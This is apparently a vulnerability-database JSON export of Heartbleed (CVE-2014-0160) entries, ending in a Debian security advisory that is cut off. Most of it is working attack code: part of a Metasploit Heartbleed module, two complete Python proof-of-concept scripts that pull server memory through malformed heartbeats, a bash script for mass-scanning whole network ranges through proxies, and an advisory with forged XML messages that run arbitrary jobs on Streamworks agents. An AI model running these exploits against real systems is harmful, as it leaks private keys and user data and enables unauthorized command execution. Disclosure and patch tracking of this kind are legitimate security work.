is selected', 'localhost' ]) \n], self.class) \n \nend \n \ndef peer \n\"#{rhost}:#{rport}\" \nend \n \ndef tls_smtp \n# https://tools.ietf.org/html/rfc3207 \nsock.get_once \nsock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\") \nres = sock.get_once \n \nunless res && res =~ /STARTTLS/ \nreturn nil \nend \nsock.put(\"STARTTLS\\n\") \nsock.get_once \nend \n \ndef tls_imap \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"a001 CAPABILITY\\r\\n\") \nres = sock.get_once \nunless res && res =~ /STARTTLS/i \nreturn nil \nend \nsock.put(\"a002 STARTTLS\\r\\n\") \nsock.get_once \nend \n \ndef tls_pop3 \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"CAPA\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ || res !~ /STLS/ \nreturn nil \nend \nsock.put(\"STLS\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ \nreturn nil \nend \nres \nend \n \ndef tls_jabber \n# http://xmpp.org/extensions/xep-0035.html \nmsg = \"<?xml version='1.0' ?>\" \nmsg << \"<stream:stream xmlns='jabber:client' \" \nmsg << \"xmlns:stream='http://etherx.jabber.org/streams' \" \nmsg << \"version='1.0' \" \nmsg << \"to='#{datastore['XMPPDOMAIN']}'>\" \nsock.put(msg) \nres = sock.get \nif res.nil? || res =~ /stream:error/ || res !~ /starttls/i \nprint_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/ \nreturn nil \nend \nmsg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\" \nsock.put(msg) \nsock.get_once \nend \n \ndef run_host(ip) \nconnect \n \nunless datastore['STARTTLS'] == 'None' \nvprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\") \nres = self.send(TTLS_CALLBACKS[datastore['STARTTLS']]) \nif res.nil? \nvprint_error(\"#{peer} - STARTTLS failed...\") \nreturn \nend \nend \n \nvprint_status(\"#{peer} - Sending Client Hello...\") \nsock.put(client_hello) \n \nserver_hello = sock.get \nunless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE \nvprint_error(\"#{peer} - Server Hello Not Found\") \nreturn \nend \n \nvprint_status(\"#{peer} - Sending Heartbeat...\") \nheartbeat_length = 16384 \nsock.put(heartbeat(heartbeat_length)) \nhdr = sock.get_once(5) \nif hdr.blank? \nvprint_error(\"#{peer} - No Heartbeat response...\") \nreturn \nend \n \nunpacked = hdr.unpack('Cnn') \ntype = unpacked[0] \nversion = unpacked[1] # must match the type from client_hello \nlen = unpacked[2] \n \n# try to get the TLS error \nif type == ALERT_RECORD_TYPE \nres = sock.get_once(len) \nalert_unp = res.unpack('CC') \nalert_level = alert_unp[0] \nalert_desc = alert_unp[1] \nmsg = \"Unknown error\" \n# http://tools.ietf.org/html/rfc5246#section-7.2 \ncase alert_desc \nwhen 0x46 \nmsg = \"Protocol error. Looks like the chosen protocol is not supported.\" \nend \nprint_error(\"#{peer} - #{msg}\") \ndisconnect \nreturn \nend \n \nunless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']] \nvprint_error(\"#{peer} - Unexpected Heartbeat response\") \ndisconnect \nreturn \nend \n \nvprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\") \nheartbeat_data = sock.get_once(heartbeat_length) # Read the magic length... \nif heartbeat_data \nprint_good(\"#{peer} - Heartbeat response with leak\") \nreport_vuln({ \n:host => rhost, \n:port => rport, \n:name => self.name, \n:refs => self.references, \n:info => \"Module #{self.fullname} successfully leaked info\" \n}) \nvprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\") \nelse \nvprint_error(\"#{peer} - Looks like there isn't leaked information...\") \nend \nend \n \ndef heartbeat(length) \npayload = \"\\x01\" # Heartbeat Message Type: Request (1) \npayload << [length].pack(\"n\") # Payload Length: 16384 \n \nssl_record(HEARTBEAT_RECORD_TYPE, payload) \nend \n \ndef client_hello \n# Use current day for TLS time \ntime_temp = Time.now \ntime_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i \n \nhello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS \nhello_data << [time_epoch].pack(\"N\") # Time in epoch format \nhello_data << Rex::Text.rand_text(28) # Random \nhello_data << \"\\x00\" # Session ID length \nhello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102) \nhello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites \nhello_data << \"\\x01\" # Compression methods length (1) \nhello_data << \"\\x00\" # Compression methods: null \n \nhello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat) \nhello_data_extensions << \"\\x00\\x01\" # Extension length \nhello_data_extensions << \"\\x01\" # Extension data \n \nhello_data << [hello_data_extensions.length].pack(\"n\") \nhello_data << hello_data_extensions \n \ndata = \"\\x01\\x00\" # Handshake Type: Client Hello (1) \ndata << [hello_data.length].pack(\"n\") # Length \ndata << hello_data \n \nssl_record(HANDSHAKE_RECORD_TYPE, data) \nend \n \ndef ssl_record(type, data) \nrecord = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn') \nrecord << data \nend \nend \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126101/openssl_heartbleed.rb.txt"}, {"lastseen": "2019-01-16T18:50:49", "references": [], "description": "", "edition": 1, "reporter": "Simon Bieber", "published": "2019-01-16T00:00:00", "title": "Streamworks Job Scheduler Release 7 Authentication Weakness", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151177", "href": "https://packetstormsecurity.com/files/151177/Streamworks-Job-Scheduler-Release-7-Authentication-Weakness.html", "sourceData": "` \nAffected Products \nStreamworks Job Scheduler Release 7 (older/newer releases have not \nbeen tested) \n \nReferences \nSecuvera-SA-2016-01 \nhttps://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for \nupdates) \nNo CVE number could be assigned (vendor not listed under \ncve.mitre.org/data/board/archives/2016-01/msg00015.html) \n \nSummary: \nArvato Systems Streamworks Job Scheduler is a software product for \nautomation purposes. It helps \n\"to plan, maintain, control and monitor all of your automatable IT \nprocesses\" (source: vendor product \nhomepage). It consists of different types of services: an \napplication server daemon, a processing \nserver daemon that controls one or multiple agent daemins \ninstalled on operating servers were workload \nhas to be done. \n \nDuring a penetration test at a customers site three weaknesses \nconcerning communication \nauthentication were discovered: \n \n1) All agents installed on server systems use the same X.509 \ncertificates and private key that \nwere issued by the vendor for authentication. \n \n2) The processing server component does not check received \nmessages properly for authenticity. \n \n3) Agents installed on servers do not check received messages \nproperly for authenticity \n \n4) Agents and processing servers are vulnerable against TLS \nHeartbleed attack (CVE-2014-0160 - \nsee https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160) \n \nEffect: \n1) If systems were compromised and authentication material is \nstolen, all certificates have to be \nrevoked and replaced. In addition, this expands the effect of \n3) to the entire environment, \nnot just single systems. \n \n2) An attacker with knwolegde of the message syntax of the product \nand the authentication material \nis able to add, change or delete data within the Streamworks database. \n \n3) An attacker with knowledge of the message syntax of the product \nand the authentication material \nis able to create new or execute available jobs on servers with \nagents installed located within \nthe same network. This can lead to a complete loss of integrity, \nconfidentiality or availability \nof the respective system or data stored/processed on it. \n \n4) An unauthenticated remote attacker is able to read content \nwithin system memory. \n \nVulnerable components and scripts: \nStreamworks Job Scheduler Processing Server Release 7.1 \nStreamworks Job Scheduler Agent Release 7.1 \nolder releases have not been tested \n \nExamples: \nIn the following, a sample to exploit 2) and 3) will be given. \nReplace Information within squared \nbrackets: \n \n2) By sending a the following XML-Message to a Processing server \nit is possible to change system \ninformation of a legitimate configured client as proof-of-concept. \nThe System OS Info was slightly \nchanged: \n \n<AgentNotifyStarted ProcessId=\"7044\" AgentVersion=\"3.1.36\"> \n<ComHeader Version=\"1.0\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime> \n<SourceEndpoint Address=\"0.0.0.0\" Port=\"30000\" SysId=\"[Hostname of \nlegitimate Client]\" /> \n<DestinationEndpoint Address=\"[FQDN of Processing server]\" \nPort=\"9600\" SysId=\"[FQDN of Proces \nsing server]\" /> \n<Sequence>0</Sequence> \n</ComHeader> \n<SystemInformation> \n<OsType>Windows</OsType> \n<OsInfo>Pentest Windows!</OsInfo> \n<OsLocale>de_DE.windows-1252</OsLocale> \n</SystemInformation> \n<KnownJobsList> \n</KnownJobsList> \n<FileTransferOptions Mode=\"ALL\" BlockSize=\"0\" /> \n<Cli CliOptions=\"Enabled\" /> \n</AgentNotifyStarted> \n \n \n------------- \n \n \n3) By sending a XML-Message of the following type to create and \nexecute a new job on a system \n<ServerRequestStartJob> \n<ComHeader Version=\"0.1\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime> \n<SourceEndpoint Address=\"[FQDN of processing server]\" \nPort=\"9600\" SysId=\"[FQDN of processing \nserver]\" /> \n<DestinationEndpoint Address=\"[IP of Server with agent \ninstalled]\" Port=\"30000\" SysId=\"[Hostname of \nserver with agent installed]\" /> \n<Sequence>1</Sequence> \n<MandatorId>0100</MandatorId> \n</ComHeader> \n<JobStartInfo> \n<JobInfo ServerJobId=\"118291965_1\" ExecutionNo=\"1\" \nPlanDate=\"[YYYY]-[MM]-[DD]\" \nStreamName=\"[NewStreamName]\" JobName=\"[NewJobName]\" Run=\"1\" /> \n<UserName>[Username under which the agent should run the \nScript, e.g. LOCAL\\System]</UserName> \n<Password>[Add Password of the user if needed]</Password> \n<UseUserProfile>true</UseUserProfile> \n<MainScript>[base64-encoded Script code, e.g. \n\"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl\" \nto start a notepad.exe on a Windows Host]</MainScript> \n<KeepJoblogDays>10</KeepJoblogDays> \n</JobStartInfo> \n</ServerRequestStartJob> \n \nSolution: \nInstall Streamworks Release 9.3 \n \n(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available \nin \ngerman only) \n \nDisclosure Timeline: \n2016/05/12 vulnerabilities discovered \n2016/05/30 vendor initially contacted \n2016/06/13 sales representative replied \n2016/06/14 technically responsible contact details received \n2016/07/01 technical personnel contacted, appointment to discuss \nfindings made \n2016/07/11 submitted technical details to responsible personnel \n2016/07/12 responsible product manager replied. Committed to \nextend disclosure timeline due to \ncomprehensible reasons. New disclosure timeline: end of \nSeptember 2016 \n2016/09/08 product manager replied, suggest meeting to discuss fixes \n2016/09/27 meeting took place, half of the vulnerabilities were \nfixed. Timeline until disclosure extended \nagain due to difficult changes. Disclosure timeline \nextended to end of April 2017 \n2017/04/20 Contacted vendor again to remind of the near end of the \ndisclosure timeline. \n2017/04/27 Reply and ongoing discussion about when the fix will be shipped. \n2017/05/20 Vendor replied that due to customers experience fewer \nreleases were made. The fix will be shipped \non the second quarter of 2018. Extended disclosure \ntimeline until the end of June 2018. \n2018/04/03 Contacted vendor as reminder and to get a release ship date. \n2018/04/09 Vendor replied saying that within release 9.3 (shipped \non 2nd quarter 2018) the issues will be fixed \nFinal disclosure timeline: 2019/01/14 after a \nsufficient grace period to customers to install the fixed \nrelease \n2019/01/14 public advisory disclosure \n \n \nCredits \nSimon Bieber, secuvera GmbH \nsbieber@secuvera.de \nhttps://www.secuvera.de \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide informa- \ntion to secure infrastructure and/or systems, not to be able to \nattack or damage. \ntherefore secuvera shall not be liable for any direct or indirect \ndamages that \nmight be caused by using this information. \n \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151177/secuvera-SA-2016-01.txt"}, {"lastseen": "2016-12-05T22:11:38", "references": [], "edition": 1, "description": "", "reporter": "Jared Stafford", "published": "2014-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "TLS Heartbeat Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html", "id": "PACKETSTORM:126072", "sourceData": "`#!/usr/bin/env python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n# Modified by Csaba Fitzl for multiple SSL / TLS version support \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nversion = [] \nversion.append(['SSL 3.0','03 00']) \nversion.append(['TLS 1.0','03 01']) \nversion.append(['TLS 1.1','03 02']) \nversion.append(['TLS 1.2','03 03']) \n \ndef create_hello(version): \nhello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \nreturn hello \n \ndef create_hb(version): \nhb = h2bin('18 ' + version + ' 00 03 01 40 00') \nreturn hb \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s,hb): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \nfor i in range(len(version)): \nprint 'Trying ' + version[i][0] + '...' \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(create_hello(version[i][1])) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(create_hb(version[i][1])) \nif hit_hb(s,create_hb(version[i][1])): \n#Stop if vulnerable \nbreak \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:07", "references": [], "edition": 1, "description": "", "reporter": "Jared Stafford", "published": "2014-04-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "id": "PACKETSTORM:126065", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:12:31", "references": [], "edition": 1, "description": "", "reporter": "1N3", "published": "2014-04-23T00:00:00", "title": "Mass Bleed 20140423", "type": "packetstorm", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-23T00:00:00", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "id": "PACKETSTORM:126288", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? \n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2018-10-18T13:48:43", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u6", "arch": "all", "packageFilename": "openssl_1.0.1e-2+deb7u6_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-2 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 08, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\n\nThis revision to the recent OpenSSL update, DSA-2896-1, checks for some\nservices that may use OpenSSL in a way that they expose the\nvulnerability. Such services are proposed to be restarted during the\nupgrade to help in the actual deployment of the fix.\n\nThe list of services that are checked is not comprehensive. For a more\ndetailed check, it is recommended to use the checkrestart tool from the\ndebian-goodies package. Note that client applications also need to be\nrestarted.\n\nIn case of doubt a full system restart is recommended.\n\nFor reference, the original advisory text follows.\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker. This vulnerability might allow\nan attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u6.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese 